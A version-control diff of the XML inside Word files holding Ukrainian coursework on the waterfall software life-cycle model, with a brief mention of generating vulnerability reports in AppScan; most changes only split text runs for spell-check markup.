+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>у з метою виправити вразливість:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69E524" wp14:editId="647F1360">
+            <wp:extent cx="5940425" cy="7144573"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
+            <wp:docPr id="17" name="Рисунок 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5940425" cy="7144573"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -27897,6 +30278,133 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Також в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> є можливість створювати звіт по результатам тестування.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Для прикладу обрано сторінку з описом знайдених вразливрстей та їх кількості:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6653E528" wp14:editId="16B1EF88">
+            <wp:extent cx="5940425" cy="5860721"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
+            <wp:docPr id="20" name="Рисунок 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5940425" cy="5860721"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -30703,7 +33211,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A97C7DD8-238A-4488-ABED-42C1316EAAAD}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D2FF57DE-E0E2-4F8E-B9A2-4E49C185F2B0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -398,7 +398,97 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Насправді, більшість дій в ході виконання проектів не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в свій час дозволені відповідним чином. Якщо на стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. Після завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні стрілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t>Насправді, більшість дій в ході виконання проекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> не відбуваються за лінійним законом. Найчастіше розробникам буває необхідно повернутися до попередньої стадії, щоб виконати завдання, які не були в </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ій час дозволені відповідним чином. Якщо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> стадії розробки виявляється відсутність або неправильне формулювання вимог, розробник не просувається вперед, а повертається назад - до стадії специфікацій вимог. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення і корекції специфікацій вимог повторно вводиться і починає виконуватися стадія розробки. Щоб відобразити повторюваний характер розробки ПО, в графіку рис. 1.1 було додано зворотні </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>стр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -529,6 +619,7 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -536,7 +627,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Короткий опис фаз каскадної моделі</w:t>
+        <w:t>Короткий</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -554,7 +655,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Наведена нижче характеристика являє собою короткий опис кожної</w:t>
+        <w:t xml:space="preserve">Наведена нижче характеристика являє собою </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>короткий</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> опис кожної</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -595,13 +714,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>дослідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>досл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідження концепції - відбувається дослідження вимог на системному рівні з метою визначення можливості реалізації концепції;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -624,7 +753,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Процес системного розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної архітектур</w:t>
+        <w:t xml:space="preserve">Процес </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>системного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>арх</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ітектур</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -664,8 +829,18 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. (В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
-      </w:r>
+        <w:t xml:space="preserve">процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(В разі необхідності в процес також включено функціональний розподіл системних вимог до апаратному) 'і програмному)' забезпечення.);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -687,7 +862,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес розробки проекту - розробляється і формулнруетсі логічно Послідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
+        <w:t xml:space="preserve">процес розробки проекту - розробляється і формулнруетсі логічно </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Посл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідовна технічна характеристика програмної системи, включаючи структури даних, архітектуру ПО, інтерфейсні уявлення і процесуальну (алгоритмічну) деталізацію;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -710,7 +903,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать в основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
+        <w:t xml:space="preserve">процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> основі фізичного перетворення проекту. Якщо програмний продукт являє собою придбаний пакет прикладних програм, основними діями по його реалізації будуть установка і тестування пакету програм. Якщо програмний продукт розробляється на замов</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -749,7 +960,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес установки-включає установку ПО, його перевірку і офіційну приймання замовником для операційного середовища;</w:t>
+        <w:t xml:space="preserve">процес установки-включає установку ПО, його </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>перев</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ірку і офіційну приймання замовником для операційного середовища;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -772,7 +1001,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес експлуатації та підтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
+        <w:t xml:space="preserve">процес експлуатації та </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримки - має на увазі запуск користувачем системи і поточне забезпечення, включаючи надання технічної допомоги, обговорення питань, що виникли з користувачем, реєстрацію запитів</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -811,7 +1058,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом підтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених інформації про аномалії;</w:t>
+        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримки. Складається з ітерацій розробки і передбачає зворотний зв'язок по про доставлених і</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>нформац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ії про аномалії;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -852,7 +1135,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> існуючої системи з її активного використання або шляхом припинення </w:t>
+        <w:t xml:space="preserve"> існуючої системи з її </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>активного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> використання або шляхом припинення </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -909,7 +1210,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну підготовку протягом усього життєвого циклу.</w:t>
+        <w:t xml:space="preserve">інтегральні завдання - включають початок роботи над проектом, моніторинг проекту та його управління, управління якістю, верифікацію і атестацію, управління конфігурацією, розробку документації і професійну </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовку протягом усього життєвого циклу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -976,7 +1295,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ель має безліч переваг, якщо її</w:t>
+        <w:t xml:space="preserve">ель має </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>безл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іч переваг, якщо її</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1051,7 +1388,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями для відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
+        <w:t xml:space="preserve">модель добре відома споживачам. які не мають відношення до розробки та експлуатації програм, і кінцевим користувачам (вона часто використовується іншими організаціями </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> відстеження проектів, не пов'язаних з розробкою ПЗ);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1099,7 +1454,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує для тих проектів, які досить зрозумілі, але все ж важк</w:t>
+        <w:t xml:space="preserve"> зі складнощами і добре спрацьовує </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
